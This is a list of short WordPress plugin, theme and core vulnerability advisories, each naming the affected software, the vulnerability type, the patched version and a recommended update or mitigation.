Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: SpeedyCache – Cache, Optimization, Performance

Vulnerability: Missing Authorization via speedycache_create_test_cache
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Pods – Custom Content Types and Fields

Vulnerability: Authenticated Stored Cross-Site Scripting via Menu Label field
Patched Version: 2.7.27
Recommended Action: Update to version 2.7.27, or a newer patched version

Plugin: Email Tracker – Email Tracking Plugin to track Emails for Open and Email Links Click (Compatible with WooCommerce)

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.2.7
Recommended Action: Update to version 5.2.7, or a newer patched version

Plugin: Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Insufficient Restrictions during Export Personal Data requests
Patched Version: 3.3.9
Recommended Action: Update to version 3.3.9, or a newer patched version

Plugin: ShortPixel Adaptive Images – WebP, AVIF, CDN, Image Optimization

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.6.2
Recommended Action: Update to version 3.6.2, or a newer patched version

Plugin: VikRentCar Car Rental Management System

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Request Forgery and Stored Cross-Site Scripting
Patched Version: 2.0.52
Recommended Action: Update to version 2.0.52, or a newer patched version

Plugin: JobCareer | Job Board Responsive WordPress Theme

Vulnerability: Unauthenticated Arbitrary Password Reset
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: WPML

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5.14
Recommended Action: Update to version 4.5.14, or a newer patched version

Plugin: WooCommerce Brands

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.6.46
Recommended Action: Update to version 1.6.46, or a newer patched version

Plugin: User registration & user profile – UserPlus

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Search Everything

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.1.1
Recommended Action: Update to version 8.1.1, or a newer patched version

Plugin: WP Hardening (discontinued)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: illi Link Party!

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form Generator : Creative form builder for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: WHIZZ

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Ghost

Vulnerability: Missing Authorization Checks
Patched Version: 0.5.6
Recommended Action: Update to version 0.5.6, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: cformsII

Vulnerability: Unauthenticated HTML Injection & Cross-Site Request Forgery
Patched Version: 15.0.2
Recommended Action: Update to version 15.0.2, or a newer patched version

Plugin: Restaurant & Cafe Addon for Elementor

Vulnerability: Missing Authorization via multiple AJAX functions
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Backend Localization

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.9.2
Recommended Action: Update to version 8.9.2, or a newer patched version

Plugin: Redirect After Login

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Radio Forge Muses Player with Skins

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: S3 Video Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 0.983
Recommended Action: Update to version 0.983, or a newer patched version

Plugin: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates

Vulnerability: Missing Authorization via templates
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: Membership Plugin – Restrict Content

Vulnerability: Information Exposure via legacy log file
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: DoLogin Security

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: Timetable and Event Schedule by MotoPress

Vulnerability: Author+ Stored Cross-Site Scripting
Patched Version: 2.3.19
Recommended Action: Update to version 2.3.19, or a newer patched version

Plugin: Avada (Fusion) Builder

Vulnerability: Unauthenticated Server-Side Request Forgery
Patched Version: 3.6.2
Recommended Action: Update to version 3.6.2, or a newer patched version

Plugin: WP Translitera

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Checkout Field Editor

Vulnerability: Cross-Site Request Forgery to Checkout Fields Update
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: download-zip-attachments

Vulnerability: Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AI Infographic Maker

Vulnerability: SQL Injection
Patched Version: 4.3.8
Recommended Action: Update to version 4.3.8, or a newer patched version

Plugin: DOOFINDER Search and Discovery for WP & WooCommerce

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Duplicate Page and Post

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: WP Customer Area

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.1.4
Recommended Action: Update to version 8.1.4, or a newer patched version

Plugin: Social Stickers

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JetEngine

Vulnerability: Authenticated (Contributor+) Privilege Escalation
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: M-vSlider

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.17.3
Recommended Action: Update to version 2.17.3, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.12
Recommended Action: Update to version 1.9.12, or a newer patched version

Plugin: Domain Replace

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hotscot Contact Form

Vulnerability: SQL Injection
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Team Members Showcase

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popup contact form

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Kaya QR Code Generator

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via url parameter
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Mediamatic – Media Library Folders

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Albo Pretorio On line

Vulnerability: Reflected Cross-Site Scripting via ‘Errore’
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: Feeds For Twitter

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Core: WordPress

Vulnerability: Brute Force of Cross-Site Request Forgery Tokens
Patched Version: 3.7.4
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.4, 3.8.4, 3.9.2

Plugin: Pop-up

Vulnerability: Missing Authorization to Settings Change
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: SVG Uploads Support

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via SVG
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Enable SVG

Vulnerability: Cross-Site Scripting via SVG
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Spiffy Calendar

Vulnerability: Event deletion via Cross-Site Request Forgery
Patched Version: 4.9.1
Recommended Action: Update to version 4.9.1, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated SQL Injection via tag_id Parameter
Patched Version: 1.3.51
Recommended Action: Update to version 1.3.51, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Authenticated Settings Change leading to Arbitrary File Upload
Patched Version: 18.3
Recommended Action: Update to version 18.3, or a newer patched version

Plugin: Gmedia Photo Gallery

Vulnerability: Local File Inclusion
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: WP RSS Images

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPFront Scroll Top

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: JSmol2WP

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Stock Sync for WooCommerce

Vulnerability: Reflected Cross-Site Scripting via page parameter
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Wholesale Market

Vulnerability: Information Disclosure via Unauthenticated Arbitrary File Download
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Advanced Woo Search

Vulnerability: Information Disclosure
Patched Version: 2.00
Recommended Action: Update to version 2.00, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.21.0
Recommended Action: Update to version 2.21.0, or a newer patched version

Plugin: Mail Masta

Vulnerability: SQL Injection via id parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Online Booking and Scheduling Plugin – Bookly

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 22.4
Recommended Action: Update to version 22.4, or a newer patched version

Plugin: Admin Menu

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Redux Framework

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.1.24
Recommended Action: Update to version 4.1.24, or a newer patched version

Plugin: Pay Per Media Player

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authenticated Cross-Site Scripting via Customizer
Patched Version: 3.7.33
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.33, 3.8.33, 3.9.31, 4.0.30, 4.1.30, 4.2.27, 4.3.23, 4.4.22, 4.5.21, 4.6.18, 4.7.17, 4.8.13, 4.9.14, 5.0.9, 5.1.5, 5.2.6, 5.3.3, 5.4.1

Plugin: WebToffee WP Backup and Migration

Vulnerability: Missing Authorization to Settings and Schedule Modification
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Google Analytics 4 (GA4), Google Ads, Meta Pixel, GTM & Multiple Pixels for Woocommerce & WordPress

Vulnerability: Missing Authorization
Patched Version: 6.5.1
Recommended Action: Update to version 6.5.1, or a newer patched version

Plugin: Power BI Embedded for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: PrettyLinks – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin

Vulnerability: Unauthenticated Stored Cross-Site Scripting via track_link
Patched Version: 2.1.10
Recommended Action: Update to version 2.1.10, or a newer patched version

Plugin: Plg Novana

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Altos Connect

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Brizy – Page Builder

Vulnerability: IP Address Spoofing to Protection Mechanism Bypass
Patched Version: 2.4.19
Recommended Action: Update to version 2.4.19, or a newer patched version

Plugin: WP Booking System – Booking Calendar

Vulnerability: Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: WP Extra File Types

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 0.5.1
Recommended Action: Update to version 0.5.1, or a newer patched version

Plugin: Video Gallery – Vimeo and YouTube Gallery

Vulnerability: Vimeo and YouTube Gallery < 1.1.5
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Connections Business Directory

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 10.4.37
Recommended Action: Update to version 10.4.37, or a newer patched version

Plugin: Testimonials Widget

Vulnerability: Multiple Authenticated Stored Cross-Site Scripting
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: Peter’s Collaboration E-mails

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Cost Estimation

Vulnerability: Missing Authorization to Arbitrary File Upload/Delete
Patched Version: 9.644
Recommended Action: Update to version 9.644, or a newer patched version

Plugin: WP Film Studio – WordPress Movie Maker/Production Plugin

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: indexisto

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Fastest Cache

Vulnerability: Missing Authorization to Cache Deletion
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: PrettyLinks – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Visitor Traffic Real Time Statistics

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.14
Recommended Action: Update to version 1.14, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via mf_first_name shortcode
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Splashing Images

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: CPT – Speakers

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Smart Slider 3

Vulnerability: Authenticated (Contributor+) PHP Object Injection
Patched Version: 3.5.1.11
Recommended Action: Update to version 3.5.1.11, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.6
Recommended Action: Update to version 4.0.6, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Cross-Site Scripting via logo_width parameter
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Master Slider – Responsive Touch Slider

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.0
Recommended Action: Update to version 2.8.0, or a newer patched version

Plugin: PowerPress Podcasting plugin by Blubrry

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Media URL
Patched Version: 11.0.12
Recommended Action: Update to version 11.0.12, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery via ajax_save_sort_order
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Insights from Google PageSpeed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Core: WordPress

Vulnerability: .swf and .exe File Upload
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: Data Tables Generator by Supsystic

Vulnerability: Missing Authorization
Patched Version: 1.10.26
Recommended Action: Update to version 1.10.26, or a newer patched version

Plugin: Advanced Custom Fields: Extended

Vulnerability: Admin+ SQL Injection
Patched Version: 0.8.8.7
Recommended Action: Update to version 0.8.8.7, or a newer patched version

Plugin: Visitors

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Weblizar Pin Feeds

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Contact Form builder with drag & drop for WordPress – Kali Forms

Vulnerability: Kali Forms <= 2.3.28
Patched Version: 2.3.29
Recommended Action: Update to version 2.3.29, or a newer patched version

Plugin: Social Like Box and Page by WpDevArt

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 0.8.40
Recommended Action: Update to version 0.8.40, or a newer patched version

Plugin: Watu Quiz

Vulnerability: 3.1.2.5
Patched Version: 3.1.2.6
Recommended Action: Update to version 3.1.2.6, or a newer patched version

Plugin: WP Editor

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: WP Hide & Security Enhancer

Vulnerability: Arbitrary File Download
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Beautiful Cookie Consent Banner

Vulnerability: Missing Authorization to Settings Update
Patched Version: 2.10.1
Recommended Action: Update to version 2.10.1, or a newer patched version

Plugin: WP User Merger

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Mantenimiento web

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 0.14
Recommended Action: Update to version 0.14, or a newer patched version

Plugin: LeadSnap

Vulnerability: Unauthenticated PHP Object Injection via AJAX
Patched Version: 1.24
Recommended Action: Update to version 1.24, or a newer patched version

Plugin: Stripe Payments For WooCommerce by Checkout Plugins

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.11
Recommended Action: Update to version 1.4.11, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 4.9.3.4
Recommended Action: Update to version 4.9.3.4, or a newer patched version

Plugin: Travel Management

Vulnerability: Open Redirect
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Oleggo LiveStream

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GetYourGuide Ticketing

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Indeed Membership Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.6.2
Recommended Action: Update to version 8.6.2, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Authentication Bypass
Patched Version: 5.4.4
Recommended Action: Update to version 5.4.4, or a newer patched version

Plugin: WP OER

Vulnerability: Cross-Site Scripting
Patched Version: 0.9.1
Recommended Action: Update to version 0.9.1, or a newer patched version

Core: WordPress

Vulnerability: Spoof Post Authorship
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: WPGraphQL

Vulnerability: Information Exposure
Patched Version: 0.3.5
Recommended Action: Update to version 0.3.5, or a newer patched version

Plugin: Essential Blocks Pro

Vulnerability: Unauthenticated PHP Object Injection via queries
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: WordPress Button Plugin MaxButtons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 9.6
Recommended Action: Update to version 9.6, or a newer patched version

Plugin: Matterport Shortcode

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: Event Manager and Tickets Selling Plugin for WooCommerce – WpEvently – WordPress Plugin

Vulnerability: Cross-Site Request Forgery leading to Uninstall Form Submission
Patched Version: 3.7.8
Recommended Action: Update to version 3.7.8, or a newer patched version

Plugin: WP Super Minify

Vulnerability: Cross-Site Request Forgery via ‘wpsmy_admin_options’
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Ecwid by Lightspeed Ecommerce Shopping Cart

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 4.4.4
Recommended Action: Update to version 4.4.4, or a newer patched version

Plugin: Podlove Subscribe button

Vulnerability: Cross-Site Request Forgery via process_form function
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: BAN Users

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Settings Update & Privilege Escalation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Sign Up

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Cross-Site Request Forgery to Disable All Plugins
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: Zero Spam for WordPress

Vulnerability: SQL Injection
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Core: WordPress

Vulnerability: 6.3.1
Patched Version: 6.3.2
Recommended Action: Update to version 6.3.2, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Authenticated (Administrator+) Arbitrary File Deletion
Patched Version: 0.9.77
Recommended Action: Update to version 0.9.77, or a newer patched version

Plugin: Social Media Widget by Acurax

Vulnerability: Cross-Site Request Forgery leading to Cross-Site Scripting via the recordsArray Parameter
Patched Version: 3.2.6
Recommended Action: Update to version 3.2.6, or a newer patched version

Plugin: Button Generator – easily Button Builder

Vulnerability: Cross-Site Request Forgery in tools-data-base.php
Patched Version: 2.3.6
Recommended Action: Update to version 2.3.6, or a newer patched version

Plugin: Tweet Blender

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: WP-EMail

Vulnerability: SQL Injection
Patched Version: 2.67.2
Recommended Action: Update to version 2.67.2, or a newer patched version

Plugin: CMP – Coming Soon & Maintenance Plugin by NiteoThemes

Vulnerability: Maintenance Mode Bypass
Patched Version: 4.1.8
Recommended Action: Update to version 4.1.8, or a newer patched version

Plugin: Image Slider by Ays- Responsive Slider and Carousel

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: Random Banner

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Beaver Builder – WordPress Page Builder

Vulnerability: Authenticated Stored Cross-Site Scripting via ‘caption’
Patched Version: 2.5.5.3
Recommended Action: Update to version 2.5.5.3, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: wpDiscuz <= 7.3.0
Patched Version: 7.3.2
Recommended Action: Update to version 7.3.2, or a newer patched version

Plugin: Login by Auth0

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: User Private Files – File Upload & Download Manager with Secure File Sharing

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: Rimons Twitter Widget

Vulnerability: Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: qTranslate X

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Improper Authorization on REST Routes via ‘save_settings_permission’
Patched Version: 4.0.26
Recommended Action: Update to version 4.0.26, or a newer patched version

Plugin: Custom Sidebars – Dynamic Sidebar Widget Area Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.8.1
Recommended Action: Update to version 3.0.8.1, or a newer patched version

Plugin: Evarisk

Vulnerability: Arbitrary File Upload
Patched Version: 5.1.5.5
Recommended Action: Update to version 5.1.5.5, or a newer patched version

Plugin: MailPoet Newsletters (Previous)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Sensitive Information Disclosure leading to Remote Code Execution
Patched Version: 1.2.42
Recommended Action: Update to version 1.2.42, or a newer patched version

Plugin: Q2W3 Post Order

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PressForward

Vulnerability: Cross-Site Scripting
Patched Version: 5.2.4
Recommended Action: Update to version 5.2.4, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: DOM-Based iFrame Injection
Patched Version: 3.5.5
Recommended Action: Update to version 3.5.5, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Improper Input Validation via openssl_verify
Patched Version: 0.9.7.4
Recommended Action: Update to version 0.9.7.4, or a newer patched version

